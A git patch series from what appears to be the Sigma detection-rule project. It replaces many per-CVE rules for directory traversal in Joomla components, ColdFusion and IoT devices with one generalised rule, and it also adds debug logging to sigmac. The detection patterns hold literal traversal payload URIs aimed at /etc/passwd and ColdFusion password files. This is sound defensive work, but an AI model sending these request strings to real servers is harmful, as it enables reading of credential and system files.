@@ -1,26 +0,0 @@ -title: CVE-2010-1953 Exploitation Attempt -id: ebcd435e-0ed6-4d35-b08f-d5a875608f82 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion:Directory - traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 - for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in - the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1954_exploitation_attempt.yml b/rules/web/web_cve_2010_1954_exploitation_attempt.yml deleted file mode 100644 index 1da216a2..00000000 --- a/rules/web/web_cve_2010_1954_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-1954 Exploitation Attempt -id: 651421c8-279e-4813-954e-64b9d05d1a06 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion:Directory - traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component - 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. - (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1955_exploitation_attempt.yml b/rules/web/web_cve_2010_1955_exploitation_attempt.yml deleted file mode 100644 index abdda4f9..00000000 --- a/rules/web/web_cve_2010_1955_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-1955 Exploitation Attempt -id: ed851f14-5b09-4463-bd9b-75bade8718ff -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion:Directory - traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 - for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in - the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1956_exploitation_attempt.yml b/rules/web/web_cve_2010_1956_exploitation_attempt.yml deleted file mode 100644 index 448c125f..00000000 --- a/rules/web/web_cve_2010_1956_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-1956 Exploitation Attempt -id: 19d87410-0d59-4176-b0f2-65c2e33c07e7 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion:Directory - traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 - and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot - dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1979_exploitation_attempt.yml b/rules/web/web_cve_2010_1979_exploitation_attempt.yml deleted file mode 100644 index 1ecb9b3b..00000000 --- a/rules/web/web_cve_2010_1979_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-1979 Exploitation Attempt -id: 924df1b0-04f2-4e4a-b638-519a6eb3d4e5 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion:Directory - traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build - 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) - in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1980_exploitation_attempt.yml b/rules/web/web_cve_2010_1980_exploitation_attempt.yml deleted file mode 100644 index c142f120..00000000 --- a/rules/web/web_cve_2010_1980_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-1980 Exploitation Attempt -id: f6af8453-b1d9-4714-a005-fd231d940855 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion:Directory - traversal vulnerability in joomlaflickr.php in the Joomla Flickr (com_joomlaflickr) - component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary - local files via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1981_exploitation_attempt.yml b/rules/web/web_cve_2010_1981_exploitation_attempt.yml deleted file mode 100644 index a66a6582..00000000 --- a/rules/web/web_cve_2010_1981_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-1981 Exploitation Attempt -id: c0bc20f5-f9f7-4019-83fd-19398acdfb0a -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Fabrik 2.0 - Local File Inclusion:Directory traversal - vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote - attackers to read arbitrary files via a .. (dot dot) in the controller parameter - to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1983_exploitation_attempt.yml b/rules/web/web_cve_2010_1983_exploitation_attempt.yml deleted file mode 100644 index 208e28d0..00000000 --- a/rules/web/web_cve_2010_1983_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-1983 Exploitation Attempt -id: 113530a7-3288-4f04-887d-127c962e0415 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component redTWITTER 1.0 - Local File Inclusion:Directory traversal - vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 - for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in - the view parameter to index.php -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_2033_exploitation_attempt.yml b/rules/web/web_cve_2010_2033_exploitation_attempt.yml deleted file mode 100644 index 133697d2..00000000 --- a/rules/web/web_cve_2010_2033_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-2033 Exploitation Attempt -id: 8081629e-b3a0-4abc-b254-1cdf6cd8f9c8 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla Percha Categories Tree 0.6 - Local File Inclusion:Directory traversal - vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x - for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified - other impact via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_2034_exploitation_attempt.yml b/rules/web/web_cve_2010_2034_exploitation_attempt.yml deleted file mode 100644 index 55fa1106..00000000 --- a/rules/web/web_cve_2010_2034_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-2034 Exploitation Attempt -id: af8a99cc-e237-405f-a399-dd3d81109c90 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Percha Image Attach 1.1 - Directory Traversal:Directory - traversal vulnerability in the Percha Image Attach (com_perchaimageattach) component - 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have - unspecified other impact via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_2035_exploitation_attempt.yml b/rules/web/web_cve_2010_2035_exploitation_attempt.yml deleted file mode 100644 index ab08ba81..00000000 --- a/rules/web/web_cve_2010_2035_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-2035 Exploitation Attempt -id: 58483eec-3415-4b3a-958b-5107727a3388 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal:Directory - traversal vulnerability in the Percha Gallery (com_perchagallery) component 1.6 - Beta for Joomla! allows remote attackers to read arbitrary files and possibly have - unspecified other impact via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_2036_exploitation_attempt.yml b/rules/web/web_cve_2010_2036_exploitation_attempt.yml deleted file mode 100644 index 0d46db2a..00000000 --- a/rules/web/web_cve_2010_2036_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-2036 Exploitation Attempt -id: e5fa9960-e1c3-4f95-93c0-66e3c29bd5d8 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Percha Fields Attach 1.0 - Directory Traversal:Directory - traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component - 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have - unspecified other impact via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_2122_exploitation_attempt.yml b/rules/web/web_cve_2010_2122_exploitation_attempt.yml deleted file mode 100644 index 015f44d8..00000000 --- a/rules/web/web_cve_2010_2122_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-2122 Exploitation Attempt -id: be413e66-166e-42bb-875d-72552abfe774 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component simpledownload 0.9.5 - Local File Disclosure:Directory - traversal vulnerability in the SimpleDownload (com_simpledownload) component before - 0.9.6 for Joomla! allows remote attackers to include and execute arbitrary local - files via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_2259_exploitation_attempt.yml b/rules/web/web_cve_2010_2259_exploitation_attempt.yml deleted file mode 100644 index 32350c5d..00000000 --- a/rules/web/web_cve_2010_2259_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-2259 Exploitation Attempt -id: c26a4ac4-9dff-47b3-a602-70eb83aad468 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component com_bfsurvey - Local File Inclusion:Directory traversal - vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote - attackers to include and execute arbitrary local files via a .. (dot dot) in the - controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_2307_exploitation_attempt.yml b/rules/web/web_cve_2010_2307_exploitation_attempt.yml deleted file mode 100644 index 91eeaa63..00000000 --- a/rules/web/web_cve_2010_2307_exploitation_attempt.yml +++ /dev/null 
@@ -1,27 +0,0 @@ -title: CVE-2010-2307 Exploitation Attempt -id: dd54adb6-05b1-40d6-a609-d5c8f3745853 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - - Directory Traversal:Multiple directory traversal vulnerabilities in the web server - for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC - allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), - (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /../../etc/passwd - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_2682_exploitation_attempt.yml b/rules/web/web_cve_2010_2682_exploitation_attempt.yml deleted file mode 100644 index 3f464d30..00000000 --- a/rules/web/web_cve_2010_2682_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-2682 Exploitation Attempt -id: 74bbe7ca-4136-46a2-a5fd-f521b0c773b3 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion:Directory - traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 - for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified - other impact via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_2861_exploitation_attempt.yml b/rules/web/web_cve_2010_2861_exploitation_attempt.yml deleted file mode 100644 index 8477110d..00000000 --- a/rules/web/web_cve_2010_2861_exploitation_attempt.yml +++ /dev/null 
@@ -1,27 +0,0 @@ -title: CVE-2010-2861 Exploitation Attempt -id: b7f12d62-4aa3-48aa-bfbf-5a12966ebed9 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI:Multiple directory traversal - vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier - allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, - (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, - and (5) enter.cfm in CFIDE/administrator/. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_2920_exploitation_attempt.yml b/rules/web/web_cve_2010_2920_exploitation_attempt.yml deleted file mode 100644 index 32a850de..00000000 --- a/rules/web/web_cve_2010_2920_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-2920 Exploitation Attempt -id: c4bdce4d-6a3c-4760-be05-a3bf923f7f0e -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion:Directory - traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component - 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory - traversal sequences in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_3426_exploitation_attempt.yml b/rules/web/web_cve_2010_3426_exploitation_attempt.yml deleted file mode 100644 index 69f3ca3f..00000000 --- a/rules/web/web_cve_2010_3426_exploitation_attempt.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: CVE-2010-3426 Exploitation Attempt -id: 4387e23a-0022-454e-8f9a-e2f19b97fbce -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion:Directory - traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha - 3 for Joomla! allows remote attackers to include and execute arbitrary local files - via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_4231_exploitation_attempt.yml b/rules/web/web_cve_2010_4231_exploitation_attempt.yml deleted file mode 100644 index a04663df..00000000 --- a/rules/web/web_cve_2010_4231_exploitation_attempt.yml +++ /dev/null @@ -1,25 +0,0 @@ -title: CVE-2010-4231 Exploitation Attempt -id: 7f38b244-d9e1-4ad4-a4c2-326accaefbfd -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Camtron CMNC-200 IP Camera - Directory Traversal:The CMNC-200 IP Camera - has a built-in web server that is enabled by default. The server is vulnerable to - directory transversal attacks, allowing access to any file on the camera file system. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /../../../../../../../../../../../../../etc/passwd - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical 
diff --git a/rules/web/web_cve_2010_4617_exploitation_attempt.yml b/rules/web/web_cve_2010_4617_exploitation_attempt.yml deleted file mode 100644 index 9cb15eca..00000000 --- a/rules/web/web_cve_2010_4617_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-4617 Exploitation Attempt -id: 62a7a20d-34f2-4b54-962b-539f17723730 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component JotLoader 2.2.1 - Local File Inclusion:Directory traversal - vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows - remote attackers to read arbitrary files via directory traversal sequences in the - section parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_path_traversal_exploitation_attempt.yml b/rules/web/web_path_traversal_exploitation_attempt.yml new file mode 100644 index 00000000..e0d8c12f --- /dev/null +++ b/rules/web/web_path_traversal_exploitation_attempt.yml 
@@ -0,0 +1,26 @@ +title: Path Traversal Exploitation Attempts +id: f28d6faa-4163-4967-b397-414aab6cbe41 +author: Subhash Popuri (@pbssubhash), Florian Roth (generalisation) +date: 2021/08/25 +modified: 2021/09/25 +status: experimental +description: Detects path traversal exploitation attempts +references: + - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver +detection: + selection: + c-uri|contains: + - '../../../../../etc/passwd' + - '../../../../windows/' + - '../../../../../lib/password' + condition: selection +false_positives: + - Happens all the time on systems exposed to the Internet + - Penetration testing activity on internal systems + - Internal vulnerability scanners +tags: + - attack.initial_access + - attack.t1190 +level: medium From 93bff7f49d6397d2cb2466945122d1790e31fdef Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 25 Sep 2021 11:37:39 +0200 Subject: [PATCH 1110/1367] docs: new ID --- rules/web/web_path_traversal_exploitation_attempt.yml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/rules/web/web_path_traversal_exploitation_attempt.yml b/rules/web/web_path_traversal_exploitation_attempt.yml index e0d8c12f..4a2591c9 100644 --- a/rules/web/web_path_traversal_exploitation_attempt.yml +++ b/rules/web/web_path_traversal_exploitation_attempt.yml @@ -1,8 +1,7 @@ title: Path Traversal Exploitation Attempts -id: f28d6faa-4163-4967-b397-414aab6cbe41 +id: 7745c2ea-24a5-4290-b680-04359cb84b35 author: Subhash Popuri (@pbssubhash), Florian Roth (generalisation) -date: 2021/08/25 -modified: 2021/09/25 +date: 2021/09/25 status: experimental description: Detects path traversal exploitation attempts references: From d08d3712bef9aeea86cc8dc4b4be3c91926a0cee Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 25 Sep 2021 19:33:30 +0200 Subject: [PATCH 1111/1367] Add more debug info --- tools/sigma/sigmac.py | 27 +++++++++++++++++++++++++-- 1 file changed, 25 insertions(+), 2 deletions(-) 
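Review bot: The generalised `c-uri|contains` selection only matches a literal, unencoded `../` run of a fixed depth — five levels before `etc/passwd`, four before `windows/` and `lib/password` — so the shallower `/../../etc/passwd` form that the deleted CVE-2010-2307 rule covered, and any request in which the traversal sequence is URL-encoded, no longer matches. If that narrowing is intended it should be stated in the rule text, e.g. `description: Detects unencoded path traversal exploitation attempts with at least four directory levels`; otherwise a shorter anchor such as `'../../etc/passwd'` restores the depth coverage, at some cost in the false positives the rule already acknowledges. The `level: medium` and the broadened `false_positives` are consistent with that trade-off and need no change.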
diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 350ffb86..52b04a24 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -151,6 +151,7 @@ def main(): logger = logging.getLogger(__name__) if cmdargs.debug: # pragma: no cover + logging.basicConfig(filename='sigmac.log', filemode='w', level=logging.DEBUG) logger.setLevel(logging.DEBUG) if cmdargs.lists: @@ -175,6 +176,8 @@ def main(): argparser.print_usage() sys.exit(ERR_NO_TARGET) + logger.debug("* Target selected %s" % (cmdargs.target)) + rulefilter = None if cmdargs.filter: try: @@ -265,6 +268,7 @@ def main(): output_array = [] for sigmafile in get_inputs(cmdargs.inputs, cmdargs.recurse): logger.debug("* Processing Sigma input %s" % (sigmafile)) + success = True try: if cmdargs.inputs == ['-']: f = sigmafile 
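Review bot: The new `logging.basicConfig(filename='sigmac.log', filemode='w', level=logging.DEBUG)` in the `--debug` branch silently creates or truncates a file at a fixed relative path in whatever directory sigmac is run from, and because it configures the root logger at DEBUG it collects records from every module, not only `__name__`; none of that is visible to the user or in the commit message. `basicConfig` is also a no-op when the root logger already has a handler, in which case the `--debug` output goes wherever that handler points rather than to the file. The file name has become an implicit interface, since `contrib/sigmacover.py` later on this page opens `sigmac.log` by that exact name, so at minimum add `# --debug also writes the full DEBUG log to ./sigmac.log (truncated each run); contrib/sigmacover.py parses it` above the call, and consider exposing the path as an option. `main()` begins before the first hunk and continues after the last one.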
@@ -325,43 +329,59 @@ def main(): except OSError as e: print("Failed to open Sigma file %s: %s" % (sigmafile, str(e)), file=sys.stderr) + logger.debug("* Convertion Sigma input %s FAILURE" % (sigmafile)) + success = False error = ERR_OPEN_SIGMA_RULE except (yaml.parser.ParserError, yaml.scanner.ScannerError) as e: print("Error: Sigma file %s is no valid YAML: %s" % (sigmafile, str(e)), file=sys.stderr) + logger.debug("* Convertion Sigma input %s FAILURE" % (sigmafile)) + success = False error = ERR_INVALID_YAML if not cmdargs.defer_abort: sys.exit(error) except (SigmaParseError, SigmaCollectionParseError) as e: print("Error: Sigma parse error in %s: %s" % (sigmafile, str(e)), file=sys.stderr) + logger.debug("* Convertion Sigma input %s FAILURE" % (sigmafile)) + success = False error = ERR_SIGMA_PARSING if not cmdargs.defer_abort: sys.exit(error) except NotSupportedError as e: print("Error: The Sigma rule requires a feature that is not supported by the target system: " + str(e), file=sys.stderr) + logger.debug("* Convertion Sigma input %s FAILURE" % (sigmafile)) + success = False if not cmdargs.ignore_backend_errors: error = ERR_NOT_SUPPORTED if not cmdargs.defer_abort: sys.exit(error) except BackendError as e: print("Error: Backend error in %s: %s" % (sigmafile, str(e)), file=sys.stderr) + logger.debug("* Convertion Sigma input %s FAILURE" % (sigmafile)) + success = False if not cmdargs.ignore_backend_errors: error = ERR_BACKEND if not cmdargs.defer_abort: sys.exit(error) except (NotImplementedError, TypeError) as e: print("An unsupported feature is required for this Sigma rule (%s): " % (sigmafile) + str(e), file=sys.stderr) + logger.debug("* Convertion Sigma input %s FAILURE" % (sigmafile)) + success = False if not cmdargs.ignore_backend_errors: error = ERR_NOT_IMPLEMENTED if not cmdargs.defer_abort: sys.exit(error) except PartialMatchError as e: print("Error: Partial field match error: %s" % str(e), file=sys.stderr) + logger.debug("* Convertion Sigma input %s 
FAILURE" % (sigmafile)) + success = False if not cmdargs.ignore_backend_errors: error = ERR_PARTIAL_FIELD_MATCH if not cmdargs.defer_abort: sys.exit(error) except FullMatchError as e: print("Error: Full field match error", file=sys.stderr) + logger.debug("* Convertion Sigma input %s FAILURE" % (sigmafile)) + success = False if not cmdargs.ignore_backend_errors: error = ERR_FULL_FIELD_MATCH if not cmdargs.defer_abort: @@ -371,11 +391,14 @@ def main(): f.close() except: pass - + + if success : + logger.debug("* Convertion Sigma input %s SUCCESS" % (sigmafile)) + result = backend.finalize() if result: print(result, file=out) - + if cmdargs.output_fields: if cmdargs.output_format == 'json': print(json.dumps(output_array, indent=4, ensure_ascii=False), file=out) From d888ce67bc179a86bedd3501cb28b80af3c8eb9d Mon Sep 17 00:00:00 2001 From: MetallicHack <35694352+MetallicHack@users.noreply.github.com> Date: Sat, 25 Sep 2021 21:57:10 +0200 Subject: [PATCH 1112/1367] Create azure_ad_user_added_to_sensitive_role.yml --- rules/cloud/azure/azure_ad_user_added_to_sensitive_role.yml | 1 + 1 file changed, 1 insertion(+) create mode 100644 rules/cloud/azure/azure_ad_user_added_to_sensitive_role.yml diff --git a/rules/cloud/azure/azure_ad_user_added_to_sensitive_role.yml b/rules/cloud/azure/azure_ad_user_added_to_sensitive_role.yml new file mode 100644 index 00000000..9daeafb9 --- /dev/null +++ b/rules/cloud/azure/azure_ad_user_added_to_sensitive_role.yml @@ -0,0 +1 @@ +test From f196e3174d6edc30f78d0fa53e2d05dd01ff53fc Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 26 Sep 2021 10:54:11 +0200 Subject: [PATCH 1113/1367] refactor: moved last global rule to unsupported --- .../windows/builtin => rules-unsupported}/win_apt_apt29_tor.yml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {rules/windows/builtin => rules-unsupported}/win_apt_apt29_tor.yml (100%) mode change 100755 => 100644 
